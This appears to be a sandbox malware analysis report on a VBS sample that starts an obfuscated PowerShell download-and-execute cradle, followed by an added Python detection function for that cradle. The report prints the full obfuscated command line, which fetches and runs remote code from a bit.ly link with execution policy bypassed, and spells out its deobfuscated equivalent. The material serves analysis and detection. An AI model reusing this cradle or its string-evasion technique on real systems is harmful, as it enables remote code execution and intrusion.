Analysis
Max time kernel: 7s
Max time network: 56s
Platform: windows7_x64
Resource: win7v20210408
Submitted: 25-07-2021 06:22
Static task: static1
Behavioral task: behavioral1 (sample LUID618.vbs, resource win7v20210408, platform windows7_x64)
0 signatures, 0 seconds
General
Target: LUID618.vbs
Size: 662B
MD5: a39f9093ecdceb92cf629cd5764dd1d2
SHA1: 1942c681159cbbce82dc7388b0de29b984f43bd8
SHA256: 83d832887ed1b0af95ca14e647463251f0c9660971fddb03d3959647d6faee4d
SHA512: c18fd694af943cdc74a0679fe43214afb9c652a5e53dca386e631d765449e64bff524809ef2a7923843272dc9040a080028e4f1709eb37b95723b14443521c1a
Score: 8/10
Malware Config
Signatures
Blocklisted process makes network request (1 IoC)
  flow 6, PID 1528 powershell.exe
Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
  Caveat: this is a generic heuristic. In this run the only process involved is powershell.exe, whose command line opens with `gdr -*` (Get-PSDrive), a drive enumeration that is the likely trigger; nothing else in the report points to ransomware.
Suspicious behavior: EnumeratesProcesses (2 IoCs)
  PID 1528 powershell.exe (2 occurrences)
Suspicious use of AdjustPrivilegeToken (1 IoC)
  Token: SeDebugPrivilege, PID 1528 powershell.exe
Suspicious use of WriteProcessMemory (3 IoCs)
  PID 1980 WScript.exe wrote to memory of PID 1528 powershell.exe (3 occurrences)
Processes
1. C:\Windows\System32\WScript.exe (PID 1980)
   Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\LUID618.vbs"
   Signatures: Suspicious use of WriteProcessMemory
2. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1528, child of PID 1980)
   Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec Bypass gdr -*;Set-Variable 5 (&(Get-Item Variable:/E*t).Value.InvokeCommand.(((Get-Item Variable:/E*t).Value.InvokeCommand|Get-Member|?{(DIR Variable:/_).Value.Name-ilike'*ts'}).Name).Invoke('*w-*ct')Net.WebClient);Set-Variable S 'https://bit.ly/3x1bIxK'; (Get-Item Variable:/E*t).Value.InvokeCommand.InvokeScript((GCI Variable:5).Value.((((GCI Variable:5).Value|Get-Member)|?{(DIR Variable:/_).Value.Name-ilike'*wn*g'}).Name).Invoke((GV S -ValueO)))
   Signatures: Blocklisted process makes network request; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
   Deobfuscated: the command line is a download-and-execute cradle that avoids the literal strings most detections key on. `(Get-Item Variable:/E*t).Value` reads the automatic variable matching `E*t` from the Variable: drive, i.e. $ExecutionContext; `(DIR Variable:/_).Value` is `$_` and `(GV S -ValueO)` is `Get-Variable S -ValueOnly`. Piping `$ExecutionContext.InvokeCommand` through Get-Member and filtering on `-ilike '*ts'` resolves the method name GetCmdlets at run time, `.Invoke('*w-*ct')` resolves the New-Object cmdlet, and `&` calls it with `Net.WebClient`, so `$5` is a WebClient. `$S` holds the URL, `'*wn*g'` selects WebClient.DownloadString, and the fetched text is handed to `InvokeCommand.InvokeScript`. Net effect: `IEX (New-Object Net.WebClient).DownloadString('https://bit.ly/3x1bIxK')`, run with `-exec Bypass`. The bit.ly short link hides the real second-stage host, and the Network section of this report shows no captured entries, so the second stage is not available here.
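The powershell.exe command line above is the whole payload of this sample, so what a practitioner wants from this report is a way to recognise the same cradle shape in process-creation telemetry even when the literal strings ($ExecutionContext, New-Object, DownloadString, IEX) never appear. The following is an added example, not part of the sandbox report: a Python triage function with hand-written indicator regexes (the indicator names are this example's own labels, not the sandbox's signature names), run over the PID 1528 command line copied from the report and over a constructed benign baseline.

```python
"""Static triage of an obfuscated PowerShell download cradle.

Added example for this report, not sandbox code. Indicator names are our own labels.
"""
import re

# Constructed input: the powershell.exe command line recorded for PID 1528 in the report above.
SAMPLE_CMDLINE = r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec Bypass gdr -*;Set-Variable 5 (&(Get-Item Variable:/E*t).Value.InvokeCommand.(((Get-Item Variable:/E*t).Value.InvokeCommand|Get-Member|?{(DIR Variable:/_).Value.Name-ilike'*ts'}).Name).Invoke('*w-*ct')Net.WebClient);Set-Variable S 'https://bit.ly/3x1bIxK'; (Get-Item Variable:/E*t).Value.InvokeCommand.InvokeScript((GCI Variable:5).Value.((((GCI Variable:5).Value|Get-Member)|?{(DIR Variable:/_).Value.Name-ilike'*wn*g'}).Name).Invoke((GV S -ValueO)))'''

# Constructed benign baseline: an ordinary administrative invocation.
BENIGN_CMDLINE = r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "Get-Date"'''

# (label, case-insensitive regex, why it matters). Each targets the obfuscation
# technique rather than a literal cmdlet name, which is what the sample avoids.
INDICATORS = [
    ("exec_bypass", r"-(?:ex\w*|ep)\s+bypass",
     "execution policy disabled on the command line (-exec/-ex/-ep Bypass)"),
    ("variable_drive_wildcard", r"\bVariable:/?[A-Za-z_]*\*[A-Za-z_]*",
     "automatic variable fetched via the Variable: drive with a wildcard (hides $ExecutionContext)"),
    ("member_reflection", r"Get-Member.*?-i?like\s*'[^']*\*[^']*'",
     "method name chosen at run time by wildcard over Get-Member output"),
    ("wildcard_cmdlet_lookup", r"\.Invoke\(\s*'[^']*\*[^']*'\s*\)",
     "cmdlet resolved by wildcard pattern (e.g. '*w-*ct' for New-Object)"),
    ("webclient", r"Net\.WebClient",
     "System.Net.WebClient instantiated"),
    ("invokescript", r"InvokeCommand\.InvokeScript|\bIEX\b|Invoke-Expression",
     "fetched text handed to the script engine"),
]

URL_RE = re.compile(r"https?://[^\s'\"\)]+", re.IGNORECASE)


def analyze_cradle(cmdline: str) -> dict:
    """Return matched indicator labels, extracted URLs and a cradle verdict.

    The verdict is deliberately conservative: a URL plus both a fetch primitive
    and an execution primitive. Any single indicator alone is only a hint.
    """
    hits = [name for name, pattern, _ in INDICATORS
            if re.search(pattern, cmdline, re.IGNORECASE)]
    urls = list(dict.fromkeys(URL_RE.findall(cmdline)))  # de-duplicate, keep order
    cradle = bool(urls) and "webclient" in hits and "invokescript" in hits
    return {"indicators": hits, "urls": urls, "download_cradle": cradle}


def explain(cmdline: str) -> str:
    """Human-readable triage summary for an analyst note."""
    result = analyze_cradle(cmdline)
    reasons = {name: why for name, _, why in INDICATORS}
    lines = [f"download cradle: {result['download_cradle']}"]
    lines += [f"  url: {u}" for u in result["urls"]]
    lines += [f"  {name}: {reasons[name]}" for name in result["indicators"]]
    return "\n".join(lines)


if __name__ == "__main__":
    print("--- sample (PID 1528) ---")
    print(explain(SAMPLE_CMDLINE))
    print("--- benign baseline ---")
    print(explain(BENIGN_CMDLINE))
```

The indirection through the Variable: drive and Get-Member is the part worth alerting on: legitimate scripts have no reason to look up `$ExecutionContext` or a method name by wildcard, whereas `-exec Bypass` or `Net.WebClient` on their own appear in plenty of benign administration.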
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
memory/1528-60-0x0000000000000000-mapping.dmp
memory/1528-62-0x00000000022D0000-0x00000000022D1000-memory.dmp (4KB)
memory/1528-63-0x000000001AD50000-0x000000001AD51000-memory.dmp (4KB)
memory/1528-64-0x000000001A8C0000-0x000000001A8C1000-memory.dmp (4KB)
memory/1528-65-0x000000001ACD0000-0x000000001ACD2000-memory.dmp (8KB)
memory/1528-66-0x000000001ACD4000-0x000000001ACD6000-memory.dmp (8KB)
memory/1528-67-0x00000000023B0000-0x00000000023B1000-memory.dmp (4KB)
memory/1528-68-0x000000001A910000-0x000000001A911000-memory.dmp (4KB)
memory/1528-69-0x000000001B600000-0x000000001B601000-memory.dmp (4KB)
memory/1528-70-0x0000000002320000-0x0000000002321000-memory.dmp (4KB)
memory/1528-71-0x000000001C390000-0x000000001C391000-memory.dmp (4KB)
memory/1980-59-0x000007FEFB761000-0x000007FEFB763000-memory.dmp (8KB)